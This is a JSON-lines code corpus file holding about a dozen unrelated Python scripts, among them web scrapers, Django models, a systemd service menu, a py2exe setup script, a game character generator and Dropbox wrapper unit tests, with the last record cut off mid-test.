+{"seq_id":"279911341","text":"import os\r\nimport traceback\r\n\r\n\r\n\r\nclass PathError(Exception):\r\n def __init__(self, message, code):\r\n self.message = \"PathError: \" + message\r\n self.code = code\r\n \r\n \r\ndef check_path(path):\r\n \"\"\"\r\n Check path.\r\n :param path: Input path.\r\n :return: path\r\n \"\"\"\r\n if not os.path.exists(path):\r\n raise PathError(\"directory path url %s is not exist.\" % path, 500)\r\n if not os.path.isdir(path):\r\n raise PathError(\"path url %s is not a directory.\" % path, 500)\r\n if path[-1] == \"\\\\\":\r\n path = path.strip(\"\\\\\")\r\n path = \"\\\\\" + path\r\n \r\n return path\r\n \r\n \r\ndef cd(path):\r\n \"\"\"\r\n Traverse the directory and add the file path to the list.\r\n :param path: Valid path.\r\n :return: file_list\r\n \"\"\"\r\n cd_list = os.listdir(path)\r\n file_list = []\r\n for ele in cd_list:\r\n temp_path = path + \"\\\\\" + ele\r\n if os.path.isfile(temp_path):\r\n file_list.append(temp_path)\r\n else:\r\n pre_list = cd(temp_path)\r\n file_list.extend(pre_list)\r\n return file_list\r\n \r\n \r\ndef print_files(files):\r\n \"\"\"\r\n Write path to txt file.\r\n :param files: file list.\r\n :return: \r\n \"\"\"\r\n open(\"txt_path.txt\", \"w\").write(\"\")\r\n if len(files) == 0:\r\n open(\"txt_path.txt\", \"w\",encoding='utf-8').write(\"None\")\r\n print(\"write success.\")\r\n return\r\n \r\n with open(\"txt_path.txt\", \"w\",encoding='utf-8') as txt_files:\r\n for file in files:\r\n if file[-4:]==\".txt\":\r\n txt_files.write(file + \"\\n\")\r\n txt_files.close()\r\n 
print(\"write success.\")\r\n return\r\n \r\n \r\n# main method\r\npath = r\"C:\\Users\\24508\\Desktop\\Resume&Job_Description\\Original_Resumes\"\r\n \r\ntry:\r\n path = check_path(path)\r\n files = cd(path)\r\n print_files(files)\r\nexcept PathError as e:\r\n print(e.message + \" errcode \" + str(e.code))\r\n print(\"errmag: \\n%s\" % traceback.format_exc())","sub_path":"MLB-GroupWork 12/Text data Extractor/path_txt.py","file_name":"path_txt.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"563618472","text":"# For all of 2013, the number of potential signals of serious risks or new\n# safety information that resulted from the FDA's FAERS\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nbase_url = 'http://www.fda.gov'\nurl = '/Drugs/GuidanceComplianceRegulatoryInformation/Surveillance/AdverseDrugEffects/ucm082196.htm'\nr = requests.get(base_url+url)\nsoup = BeautifulSoup(r.content, 'lxml')\nlinks = [base_url+link['href'] for link in soup.find_all('a', text=re.compile(\"2013\"))]\nx = 0\nfor link in links:\n two_soup = BeautifulSoup(requests.get(link).content, 'lxml')\n rows = len(two_soup.select('tbody > tr')) - 1\n x += rows\nprint(x)\n","sub_path":"my_scripts/my_62.py","file_name":"my_62.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"272753196","text":"from logging import getLogger\n\nfrom django.db import models\nfrom django.core import validators\nfrom django.dispatch import receiver\n\nfrom raw.constants import SchemeEnum, RequestMethodEnum\nfrom utils.http import (\n RequestTypeEnum, ResponseTypeEnum,\n parse_request, parse_response,\n Request as RequestObject, Response as ResponseObject,\n headers_to_list, list_to_headers\n)\n# Create your models here.\n\n\nlogger = getLogger(\"raw\")\n\n\nclass Raw(models.Model):\n\n SCHEME = tuple([\n (enum_item.value, enum_item.name)\n for enum_item in SchemeEnum.__members__.values()\n ])\n\n scheme = models.CharField(choices=SCHEME, max_length=255)\n host = models.CharField(max_length=255)\n port = models.IntegerField(validators=[validators.MaxValueValidator(\n 65535), validators.MinValueValidator(1)])\n raw_request = models.BinaryField(max_length=5 * 1024, help_text=\"原始请求\")\n raw_response = models.BinaryField(\n max_length=1024 * 1024, null=True, blank=False, help_text=\"原始响应\")\n created_time = models.DateTimeField(auto_now_add=True)\n\n url = models.ForeignKey(\n \"Url\", on_delete=models.CASCADE, related_name=\"raws\")\n\n class Meta:\n ordering = ['-created_time', ]\n\n @property\n def request_object(self):\n return parse_request(self.scheme, self.host, self.port, self.raw_request)\n\n @property\n def response_object(self):\n if not self.raw_response:\n return None\n return parse_response(self.raw_response, self.request)\n\n @property\n def url_str(self):\n return self.request_object.url\n\n @property\n def standard_url(self):\n return self.request_object.pure_url\n\n\nclass Url(models.Model):\n\n SCHEME = tuple([\n (enum_item.value, enum_item.name)\n for enum_item in SchemeEnum.__members__.values()\n ])\n\n scheme = models.CharField(choices=SCHEME, max_length=255, editable=False)\n host = models.CharField(max_length=255, editable=False)\n port = models.IntegerField(validators=[validators.MaxValueValidator(\n 65535), validators.MinValueValidator(1)], editable=False)\n path = models.CharField(max_length=255, editable=False)\n url 
= models.CharField(max_length=255, editable=False, unique=True)\n suffix = models.CharField(max_length=255, editable=False)\n\n class Meta:\n ordering = ['url', ]\n\n @classmethod\n def from_request(cls, request: RequestObject):\n i, _ = cls.objects.get_or_create(\n url=request.pure_url,\n defaults=dict(\n scheme=request.scheme,\n host=request.host,\n port=request.port,\n path=request.path,\n suffix=request.suffix\n )\n )\n return i\n\n\nclass Request(models.Model):\n REQUEST_TYPE = tuple([\n (enum_item.value, enum_item.name)\n for enum_item in RequestTypeEnum.__members__.values()\n ])\n REQUEST_METHOD = tuple([\n (enum_item.value, enum_item.name)\n for enum_item in RequestMethodEnum.__members__.values()\n ])\n\n url = models.ForeignKey(\"Url\", editable=False,\n on_delete=models.CASCADE, related_name=\"requests\")\n raw = models.OneToOneField(\n \"Raw\", on_delete=models.CASCADE, related_name=\"request\")\n\n method = models.CharField(\n max_length=255,\n choices=REQUEST_METHOD,\n default=RequestMethodEnum.GET.value,\n help_text=\"请求方法\"\n )\n request_headers = models.JSONField(editable=False, help_text=\"原始请求\")\n request_body = models.BinaryField(\n max_length=5 * 1024, editable=False, help_text=\"请求 body\")\n request_type = models.CharField(\n max_length=255,\n choices=REQUEST_TYPE,\n default=RequestTypeEnum.other.value,\n help_text=\"请求类型\"\n )\n\n class Meta:\n ordering = ['url', ]\n constraints = [\n models.UniqueConstraint(\n fields=['url', 'raw'], name='unique_request')\n ]\n\n @classmethod\n def from_request(cls, url_id, raw_id, request: RequestObject, request_type: str):\n i, _ = cls.objects.get_or_create(\n url_id=url_id,\n raw_id=raw_id,\n defaults=dict(\n method=request.method,\n request_headers=headers_to_list(request.headers),\n request_body=request.content,\n request_type=request_type,\n )\n )\n return i\n\n @property\n def request(self):\n return RequestObject(\n scheme=self.url.scheme,\n host=self.url.host,\n port=self.url.port,\n path=self.url.path,\n method=self.method,\n headers=list_to_headers(self.request_headers),\n content=self.request_body,\n first_line_format=\"relative\",\n http_version=\"HTTP/1.1\"\n )\n\n\nclass Response(models.Model):\n\n RESPONSE_TYPE = tuple([\n (enum_item.value, enum_item.name)\n for enum_item in ResponseTypeEnum.__members__.values()\n ])\n\n url = models.ForeignKey(\"Url\", editable=False,\n on_delete=models.CASCADE, related_name=\"response\")\n raw = models.OneToOneField(\n \"Raw\", on_delete=models.CASCADE, related_name=\"response\")\n request = models.OneToOneField(\n \"Request\", on_delete=models.CASCADE, related_name=\"response\")\n\n status_code = models.IntegerField(editable=False, help_text=\"响应码\")\n response_header = models.JSONField(editable=False, help_text=\"原始请求\")\n response_body = models.BinaryField(\n max_length=5 * 1024, editable=False, help_text=\"响应 body\")\n response_type = models.CharField(\n max_length=255,\n choices=RESPONSE_TYPE,\n default=ResponseTypeEnum.other.value,\n help_text=\"响应类型\"\n )\n\n class Meta:\n ordering = ['url', ]\n constraints = [\n models.UniqueConstraint(\n fields=['url', 'raw', 'request'], name='unique_response')\n ]\n\n @classmethod\n def from_response(cls, url_id, raw_id, request_id, response: ResponseObject, response_type: str):\n i, _ = cls.objects.get_or_create(\n url_id=url_id,\n raw_id=raw_id,\n request_id=request_id,\n defaults=dict(\n response_type=response_type,\n status_code=response.status_code,\n response_header=headers_to_list(response.headers),\n 
response_body=response.content,\n            )\n        )\n        return i\n\n    @property\n    def response(self):\n        return ResponseObject(\n            status_code=self.status_code,\n            headers=list_to_headers(self.response_header),\n            content=self.response_body,\n        )\n\n\n# signals\n@receiver(models.signals.post_save, sender=Raw)\ndef raw_post_created(\n    sender, instance: Raw, created: bool, **kwargs\n):\n    if not created:\n        return\n    request_object = instance.request_object\n    # create request\n    request = Request.from_request(\n        instance.url_id,\n        instance.id,\n        request_object,\n        request_object.request_type,\n    )\n    logger.info(\"create request %s:%s %s with type %s\", request.id,\n                request.method, request_object.pure_url, request.request_type)\n    # create response\n    if instance.raw_response:\n        response = Response.from_response(\n            instance.url_id,\n            instance.id,\n            request.id,\n            instance.response_object,\n            instance.response_object.response_type,\n        )\n        logger.info(\"create response for request %s with type %s\",\n                    request.id, response.response_type)\n","sub_path":"backend/raw/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"527143197","text":"import argparse\nimport os\nimport sys\n\nimport redis\n\nfrom pystdlib import shell_cmd\nfrom pystdlib.uishim import get_selection, notify\nfrom pystdlib.systemd import list_units, unit_perform, unit_show\nfrom pystdlib.xlib import switch_desktop\n\nservices = []\n\noperations = [\n    \"stop\",\n    \"restart\",\n    \"journal\",\n    \"status\",\n]\n\nparser = argparse.ArgumentParser(description=\"SystemD services management.\")\nparser.add_argument(\"--invalidate-cache\", \"-i\", dest=\"invalidate\", action=\"store_true\",\n                    help=\"drop units cache from Redis\")\n\nargs = parser.parse_args()\n\nr = redis.Redis(host='localhost', port=6379, db=0)\n\n\nif args.invalidate:\n    shell_cmd(\"pkexec systemctl daemon-reload\", shell=True,\n              stdout=sys.stdout, stderr=sys.stdout)\n    r.delete(\"system/services\")\n    sys.exit(0)\n\nif not r.exists(\"system/services\"):\n    r.lpush(\"system/services\", *list_units())\n\nservice = get_selection(sorted(list(dict.fromkeys([service.decode() for service in r.lrange(\"system/services\", 0, -1)]))),\n                        'service', lines=20, font=\"@wmFontDmenu@\")\nif not service:\n    sys.exit(1)\noperation = get_selection(operations, '> ', lines=5, font=\"@wmFontDmenu@\")\nif not operation:\n    sys.exit(1)\n\nif operation in [\"journal\", \"status\"]:\n    unit_show(service, operation, user=('user' in service),\n              shell=[\"@defaultTerminal@\", \"-e\"], tmux_session=\"@tmuxDefaultSession@\")\n    switch_desktop(1)\nelse:\n    unit_perform(service, operation, user=('user' in service))\nnotify(f\"[srvctl :: {operation}]\", f\"{service}\", timeout=5000)\n","sub_path":"modules/housekeeping/scripts/srvctl.py","file_name":"srvctl.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"449452150","text":"import os\n\nimport util\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\ndata_home = '/home/hwy/datasets'\nroot_total = data_home + '/NCFM/train/train'\n\n# with open('../relabels.csv') as f:\n#     for line in f:\n#         fname, orig, target = line.split()\n#         print('{} {} {}'.format(fname, orig, target))\n#         img = Image.open(os.path.join(root_total, orig, fname + '.jpg'))\n#         plt.imshow(img)\n#         plt.show()\n\n\nDup = None\ncorrection = [('img_06460.jpg', 'ALB', 'NoF'),\n              ('img_00568.jpg', 'ALB', 
'NoF'),\n ('img_07439.jpg', 'ALB', None),\n ('img_02271.jpg', 'SHARK', 'NoF'),\n ('img_00248.jpg', 'ALB', 'OTHER'),\n ('img_01363.jpg', 'ALB', 'OTHER'),\n ('img_01452.jpg', 'OTHER', 'LAG'),\n ('img_02086.jpg', 'ALB', 'YFT'),\n ('img_02271.jpg', 'SHARK', 'NoF'),\n ('img_02302.jpg', 'NoF', 'ALB'),\n ('img_02325.jpg', 'NoF', 'OTHER'),\n ('img_04052.jpg', 'NoF', 'OTHER'),\n ('img_04131.jpg', 'SHARK', 'NoF'),\n ('img_04880.jpg', 'OTHER', 'ALB'),\n ('img_06266.jpg', 'NoF', 'OTHER'),\n ('img_06478.jpg', 'NoF', 'OTHER'),\n ('img_06706.jpg', 'OTHER', 'ALB'),\n ('img_07212.jpg', 'DOL', 'OTHER'),\n ('img_07779.jpg', 'OTHER', Dup),\n ]\n\nfor fname, orig, target in correction:\n print('{} {} {}'.format(fname, orig, target))\n img = Image.open(os.path.join(root_total, orig, fname))\n plt.imshow(img)\n plt.show()\n","sub_path":"util/relabels.py","file_name":"relabels.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"26137531","text":"from django.conf import settings\n\nfrom action_manager.action import Action, logger\nfrom action_manager.action_event import ActionExecutedEvent\nfrom action_manager.utils.email import send_mass_template_mail\nfrom event_manager.event_actions import EXECUTED\nfrom event_manager.event_context import get_event_context, get_readable_event\nfrom libs.string_utils import strip_spaces\n\nEMAIL_ACTION_EXECUTED = 'email_action.{}'.format(EXECUTED)\n\n\nclass EmailActionExecutedEvent(ActionExecutedEvent):\n event_type = EMAIL_ACTION_EXECUTED\n\n\nclass EmailAction(Action):\n action_key = 'email'\n name = 'Email'\n event_type = EMAIL_ACTION_EXECUTED\n description = (\"Send emails.\"\n \"Emails can be sent automatically \"\n \"by subscribing to certain events on Polyaxon, \"\n \"or manually triggered by a user operation.\")\n\n @classmethod\n def _validate_config(cls, config):\n if not config:\n return {}\n\n recipients = config.get('recipients')\n if not recipients:\n return {}\n\n if isinstance(recipients, str):\n recipients = strip_spaces(recipients, sep=',', join=False)\n\n config['recipients'] = [email for email in recipients if email]\n return config\n\n @classmethod\n def _get_config(cls):\n return None\n\n @classmethod\n def serialize_event_to_context(cls, event):\n event_context = get_event_context(event)\n\n context = {\n 'subject': event_context.subject_action,\n 'notification': get_readable_event(event_context),\n }\n return {\n 'subject_template': 'notifier/subject.txt',\n 'body_template': 'notifier/body.txt',\n 'context': context\n }\n\n @classmethod\n def _prepare(cls, context):\n context = context or {}\n context['subject_template'] = (\n context.get('subject_template') or\n context.get('subject') or\n ''\n )\n context['body_template'] = (\n context.get('body_template') or\n context.get('body') or\n ''\n )\n context['context'] = (\n context.get('context') or\n None\n )\n return context\n\n @classmethod\n def _execute(cls, data, config):\n if not all([settings.EMAIL_HOST_USER, settings.EMAIL_HOST_PASSWORD]):\n logger.debug(\"Email was not setup, skipping send.\")\n return\n\n recipients = config.get('recipients')\n\n if not recipients:\n logger.warning(\"No emails given, skipping send.\")\n return\n\n subject_template = data['subject_template']\n body_template = data['body_template']\n context = data['context']\n\n send_mass_template_mail(subject_template, body_template, recipients, 
context=context)\n","sub_path":"polyaxon/action_manager/actions/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"538821788","text":"from distutils.core import setup\r\nimport py2exe, sys, os\r\nfrom glob import glob\r\nfrom test.test_ssl import data_file\r\nimport zmq.libzmq\r\n\r\n#####Begin of matplot#####\r\nfrom distutils.filelist import findall\r\nimport os\r\nimport matplotlib\r\nmatplotlibdatadir = matplotlib.get_data_path()\r\nmatplotlibdata = findall(matplotlibdatadir)\r\nmatplotlibdata_files = []\r\nfor f in matplotlibdata:\r\n dirname = os.path.join('matplotlibdata', f[len(matplotlibdatadir)+1:])\r\n matplotlibdata_files.append((os.path.split(dirname)[0], [f]))\r\n\r\n#matplotlib.use('wxagg')\r\n#####End of matplot#####\r\n\r\n\r\nsys.path.append(\"c:\\python27\\DLLs\\MSVCP90.dll\")\r\n\r\nsetup(\r\n windows = [\"PingAnalyzerGui.py\"],\r\n \r\n options = {'py2exe': {'compressed': True,\r\n 'includes': ['zmq.backend.cython', \r\n 'numpy',\r\n 'matplotlib',\r\n 'matplotlib.backends.backend_tkagg'\r\n ],\r\n \r\n 'excludes': ['zmq.libzmq', \r\n #'_gtkagg', # if doesn't run, remove excluding these backends\r\n #'_tkagg' # if doesn't run, remove excluding these backends \r\n ],\r\n \r\n 'dll_excludes': ['libzmq.pyd',\r\n 'libgdk-win32-2.0-0.dll',\r\n 'libgobject-2.0-0.dll',\r\n 'libgdk_pixbuf-2.0-0.dll'\r\n ],\r\n \r\n 'packages': ['matplotlib',\r\n 'pytz',\r\n 'FileDialog',\r\n 'scipy',\r\n \r\n ],\r\n }\r\n },\r\n \r\n data_files = [\r\n ('lib', (zmq.libzmq.__file__,)),\r\n #('.', glob('*.dll')),\r\n #('pyds', glob(r'C:\\Users\\jxue\\git\\PingAnalyzer\\PingAnalyzer\\pyds\\*.pyd',)), \r\n ],\r\n \r\n zipfile = None,\r\n)\r\n\r\n\r\n#\r\n# \r\n# Make sure you have the license if you distribute any of them, and\r\n# make sure you don't distribute files belonging to the operating system.\r\n# \r\n# OLEAUT32.dll - C:\\Windows\\system32\\OLEAUT32.dll\r\n# USER32.dll - C:\\Windows\\system32\\USER32.dll\r\n# IMM32.dll - C:\\Windows\\system32\\IMM32.dll\r\n# SHELL32.dll - C:\\Windows\\system32\\SHELL32.dll\r\n# ole32.dll - C:\\Windows\\system32\\ole32.dll\r\n# COMDLG32.dll - C:\\Windows\\system32\\COMDLG32.dll\r\n# fftpack_lite.pyd - c:\\python27\\lib\\site-packages\\numpy\\fft\\fftpack_lite.pyd\r\n# COMCTL32.dll - C:\\Windows\\system32\\COMCTL32.dll\r\n# ADVAPI32.dll - C:\\Windows\\system32\\ADVAPI32.dll\r\n# _quadpack.pyd - c:\\python27\\lib\\site-packages\\scipy\\integrate\\_quadpack.pyd\r\n# msvcrt.dll - C:\\Windows\\system32\\msvcrt.dll\r\n# WS2_32.dll - C:\\Windows\\system32\\WS2_32.dll\r\n# GDI32.dll - C:\\Windows\\system32\\GDI32.dll\r\n# MSVCP90.dll - c:\\python27\\DLLs\\MSVCP90.dll\r\n# KERNEL32.dll - C:\\Windows\\system32\\KERNEL32.dll\r\n# _cblas.pyd - c:\\python27\\lib\\site-packages\\scipy\\linalg\\_cblas.pyd\r\n# minpack2.pyd - c:\\python27\\lib\\site-packages\\scipy\\optimize\\minpack2.pyd\r\n# _umath_linalg.pyd - c:\\python27\\lib\\site-packages\\numpy\\linalg\\_umath_linalg.pyd","sub_path":"PingAnalyzer/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"250974250","text":"#eggplant\n#aubergine\nfrom random import choice\nfrom random import randint\nfrom random import shuffle\nattributenum = randint(0,7)\nskillnum = randint(0,26)\n\n# Birth signs\nsigns = [\"tower\", \"shadow\", \"lover\", \"ritual\", \"atronach\", 
\"apprentice\", \"lord\", \"steed\", \"lady\", \"serpent\", \"thief\", \"mage\",\n    \"warrior\"]\n\n    # Skills\nskills = [\"heavy armour\", \"medium armour\", \"spear\", \"acrobatics\", \"armourer\", \"axe\", \"blunt\", \"long blade\",\n\"block\", \"light armour\", \"marksman\", \"sneak\", \"athletics\", \"hand-to-hand\", \"short blade\", \"unarmoured\", \"illusion\",\n\"mercantile\", \"speechcraft\", \"alchemy\", \"conjuration\", \"enchant\", \"security\", \"alteration\", \"destruction\", \"mysticism\", \"restoration\"]\n\n# Races\nraces = [\"altmer\", \"argonian\", \"bosmer\", \"breton\", \"dunmer\", \"imperial\", \"khajiit\", \"nord\", \"orc\", \"redguard\"]\n\n# Attributes\nattributes = [\"agility\", \"endurance\", \"intelligence\", \"luck\", \"personality\", \"speed\", \"strength\", \"willpower\"]\nprint(\"Your race is \" + choice(races))\nprint(\"\\nYour birthsign is \" + choice(signs))\n\n# These randomize the skills and attributes lists\nskill_order = skills[:]\nshuffle(skill_order)\nattribute_order = attributes[:]\nshuffle(attribute_order)\n\n# We use .pop() so we don't print the same item twice\nprint(\"\\nYour major skills are as follows:\")\nfor skillcalc in range(0,5):\n\tprint(skill_order.pop())\nprint(\"\\nYour minor skills are as follows:\")\nfor skillcalc in range(0,5):\n\tprint(skill_order.pop())\nprint(\"\\nYour primary attributes are as follows:\")\nfor attributecalc in range(0,2):\n\tprint(attribute_order.pop())\n","sub_path":"morrowind.py","file_name":"morrowind.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"182470110","text":"import concurrent.futures\nimport os\nimport re\nimport sys\nimport json\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\n\nPROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))\nDRIVER_BIN = os.path.join(PROJECT_ROOT, \"chromedriver_tux\")\noption = webdriver.ChromeOptions()\noption.add_argument('headless')\n\n\ndef netmeds(generic_name):\n    names = []\n    prices = []\n    try:\n        url = \"https://www.netmeds.com/catalogsearch/result?q=\" + generic_name\n        driver = webdriver.Chrome(executable_path=DRIVER_BIN, options=option)\n        driver.get(url)\n        res = driver.execute_script(\"return document.documentElement.outerHTML\")\n        soup = BeautifulSoup(res, 'lxml')\n        main_container = soup.find(\"div\", {\"class\": \"left-block\"})\n        all_drugs = main_container.find_all(\"div\", {\"class\": \"drug_list\"})\n        for drug in all_drugs:\n            # file_name = open(\"names.txt\", 'a')\n            # file_price = open(\"prices.txt\", 'a')\n            drug_name = drug.find(\"div\", {\"class\": \"info\"}).text\n            price = drug.find(\"div\", {\"class\": \"pricebox\"}).text\n            price = re.sub('[^0-9.]', \"\", price)\n            price = str(price)[1:]\n            price = price[:5]\n            cleaned_name = re.sub('[^A-Za-z0-9 ]+', '', drug_name)\n            cleaned_name = str(cleaned_name)[41: -40]\n            names.append(cleaned_name)\n            # price = price.replace(\" \", \"\")\n            prices.append(price)\n            # file_name.write(cleaned_name+ '\\n')\n            # print(price)\n            # file_price.write(str(price) + \"\\n\")\n        return names, prices\n    except:\n        names.append(\"No results found\")\n        prices.append(\"999999\")\n        return names, prices\n\n\ndef one_mg(generic_name):\n    names = []\n    prices = []\n    try:\n        url = \"https://www.1mg.com/search/all?filter=true&name=\" + generic_name\n        driver = webdriver.Chrome(options=option)\n        
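A note on the netmeds price handling above: after `re.sub('[^0-9.]', "", price)` the code slices off the first character and truncates to five, which appears to assume a fixed prefix and can silently mangle longer prices. A more defensive normalizer could look like this sketch (the sample strings are hypothetical, not scraped output):

```python
import re

def parse_price(raw: str) -> float:
    """Extract the first decimal number from a scraped price string."""
    match = re.search(r"\d+(?:\.\d+)?", raw.replace(",", ""))
    if match is None:
        raise ValueError(f"no price found in {raw!r}")
    return float(match.group())

# Hypothetical fragments a price box might contain:
assert parse_price("MRP Rs. 1,234.50") == 1234.5
assert parse_price("Rs.99") == 99.0
```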
driver.get(url)\n        res = driver.execute_script(\"return document.documentElement.outerHTML\")\n        soup = BeautifulSoup(res, 'lxml')\n        main_container = soup.find(\"div\", {\"class\": \"row style__grid-container___3OfcL\"})\n        all_drugs = main_container.find_all(\"div\", {\"class\": \"col-xs-12 col-md-9 col-sm-9 style__container___cTDz0\"})\n        for drug in all_drugs:\n            drug_name = drug.find(\"div\", {\"class\": \"style__product-description___1vPQe\"}).text\n            price = drug.find(\"div\", {\"class\": \"style__price-tag___B2csA\"}).text\n            price = re.sub('[^0-9.]', \"\", price)\n            names.append(drug_name)\n            prices.append(price)\n        return names, prices\n    except:\n        names.append(\"No results found\")\n        prices.append(\"999999\")\n        return names, prices\n\n\ndef main(generic):\n    with concurrent.futures.ThreadPoolExecutor() as executor:\n        future1 = executor.submit(netmeds, generic)\n        future2 = executor.submit(one_mg, generic)\n\n        names_netmed, price_netmed = future1.result()\n        names_1mg, price_1mg = future2.result()\n    source_netmed = [\"netmeds\"] * len(names_netmed)\n    source_1mg = [\"1mg\"] * len(names_1mg)\n    names = names_netmed + names_1mg\n    prices = price_netmed + price_1mg\n    source = source_netmed + source_1mg\n    df = pd.DataFrame(\n        {\n            \"medicine_name\": names,\n            \"Price\": prices,\n            \"Source\": source\n        }\n    )\n    df.sort_values(by=['Price'], inplace=True)\n    try:\n        df_json = df.iloc[:10, :].to_dict(orient=\"records\")\n\n    except:\n        print(\"error creating file\")\n\n    try:\n        print(json.dumps(df_json))\n\n    except:\n        print(\"error printing\")\n\n\nif __name__ == \"__main__\":\n    main(sys.argv[1])\n","sub_path":"backend/controllers/scraper/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"485758676","text":"starting = input(\"Enter the Amount \")\r\nno_of_yrs = int(input(\"Enter the Number of Years\"))\r\ncounter = 1\r\nnew = 0\r\nif no_of_yrs < 1:\r\n    print(\"Enter value properly\")\r\nprint(\"Amount for 2018: \" + starting)\r\nwhile counter < no_of_yrs:\r\n    new = int(starting) * 2\r\n    print(\"Amount is \" + str(new))\r\n    starting = str(new)\r\n    counter = counter + 1","sub_path":"Python/Project01/Project01/file01.py","file_name":"file01.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"428476682","text":"# -*- coding: utf-8 -*-\n\nimport copy\nimport time\nfrom unittest import TestCase\n\nfrom dbxobject import DbxObject\nfrom test_data import *\n\n\nclass TestDbxObject(TestCase):\n    def setUp(self):\n        super(TestDbxObject, self).setUp()\n\n    # def test_update(self):\n    #     self.fail()\n    #\n    # def test__get_time(self):\n    #     self.fail()\n    #\n    # def test__has_key(self):\n    #     self.fail()\n    #\n    # def test__return(self):\n    #     self.fail()\n    #\n    # def test_get_key(self):\n    #     self.fail()\n    #\n    # def test_remove_key(self):\n    #     self.fail()\n\n    def test_is_valid(self):\n        a1 = DbxObject(data_error)\n        self.assertTrue(a1.is_valid)\n\n        a2 = DbxObject(data_file)\n        self.assertTrue(a2.is_valid)\n\n        a3 = DbxObject(data_folder_metadata)\n        self.assertTrue(a3.is_valid)\n\n    def test_is_error(self):\n        a2 = DbxObject(data_error_path_not_found)\n        self.assertTrue(a2.is_error)\n        self.assertTrue(a2.is_error_not_found)\n\n        a2 = DbxObject(data_folder_metadata)\n        self.assertFalse(a2.is_error)\n\n        a2 = DbxObject(data_error)\n        self.assertTrue(a2.is_error)\n\n        e1 = copy.deepcopy(data_error)\n        a2 = DbxObject(e1)\n        
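The error-classification tests here lean on a copy-mutate-reparse pattern: deep-copy the fixture, flip one tag, and assert the classification flips with it while the shared fixture stays intact. A standalone sketch of the same idea against a hypothetical Dropbox-style payload (the classifier and its shape are assumptions for illustration):

```python
import copy

def is_path_not_found(payload: dict) -> bool:
    """Classify a Dropbox-style error payload (shape assumed for illustration)."""
    error = payload.get("error", {})
    return error.get(".tag") == "path" and error.get("path", {}).get(".tag") == "not_found"

base = {"error": {".tag": "path", "path": {".tag": "not_found"}}}
mutated = copy.deepcopy(base)
mutated["error"][".tag"] = "other"

assert is_path_not_found(base)
assert not is_path_not_found(mutated)
assert is_path_not_found(base)  # deepcopy left the shared fixture untouched
```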
self.assertTrue(a2.is_error_not_found)\n e1['error']['.tag'] = 'other'\n a2 = DbxObject(e1)\n self.assertFalse(a2.is_error_not_found)\n\n e1 = copy.deepcopy(data_error)\n a2 = DbxObject(e1)\n self.assertTrue(a2.is_error_not_found)\n e1['error']['path']['.tag'] = 'other'\n a2 = DbxObject(e1)\n self.assertFalse(a2.is_error_not_found)\n\n def test_error_summary(self):\n a2 = DbxObject(data_error)\n self.assertEquals(a2.error_summary, data_error['error_summary'])\n\n def test_is_error_not_found(self):\n a2 = DbxObject(data_error_path_not_found)\n self.assertTrue(a2.is_error)\n self.assertTrue(a2.is_error_not_found)\n\n def test_is_expired(self):\n a2 = DbxObject(data_folder_metadata)\n self.assertFalse(a2.is_expired)\n DbxObject.cache_time = 1\n time.sleep(2)\n self.assertFalse(a2.is_expired)\n\n # def test_valid_until(self):\n # self.fail()\n\n # def test_tag(self):\n # self.fail()\n\n def test_is_folder(self):\n a2 = DbxObject(data_file)\n self.assertFalse(a2.is_folder)\n\n a3 = DbxObject(data_folder_metadata)\n self.assertTrue(a3.is_folder)\n\n def test_is_file(self):\n a2 = DbxObject(data_file)\n self.assertTrue(a2.is_file)\n\n a3 = DbxObject(data_folder_metadata)\n self.assertFalse(a3.is_file)\n\n def test_is_fs_entry(self):\n a3 = DbxObject(data_folder_metadata)\n self.assertTrue(a3.is_fs_entry)\n a2 = DbxObject(data_file)\n self.assertTrue(a2.is_fs_entry)\n a2 = DbxObject(data_error)\n self.assertFalse(a2.is_fs_entry)\n\n def test_is_deleted(self):\n a2 = DbxObject(data_folder_metadata_deleted)\n self.assertTrue(a2.is_deleted)\n\n a3 = DbxObject(data_folder_metadata)\n self.assertFalse(a3.is_deleted)\n\n def test_has_more(self):\n a2 = DbxObject(data_folder_metadata)\n self.assertFalse(a2.has_more)\n\n a2 = DbxObject(data_folder_entries)\n self.assertTrue(a2.has_more)\n\n a2 = DbxObject(data_folder_entries_recursive)\n self.assertFalse(a2.has_more)\n\n def test_cursor(self):\n a2 = DbxObject(data_folder_metadata)\n self.assertIsNone(a2.cursor)\n\n a2 = DbxObject(data_folder_entries)\n self.assertEqual(a2.cursor, data_folder_entries['cursor'])\n\n def test_has_entries(self):\n a2 = DbxObject(data_folder_entries)\n self.assertTrue(a2.has_entries)\n\n a2 = DbxObject(data_file)\n self.assertFalse(a2.has_entries)\n\n def test_entries(self):\n a2 = DbxObject(data_folder_entries)\n self.assertTrue(a2.has_entries)\n self.assertEquals(3, len(a2.entries))\n\n def test_has_sub_items(self):\n a2 = DbxObject(data_folder_entries)\n self.assertTrue(a2.has_entries)\n\n a2 = DbxObject(data_file)\n self.assertFalse(a2.has_entries)\n\n def 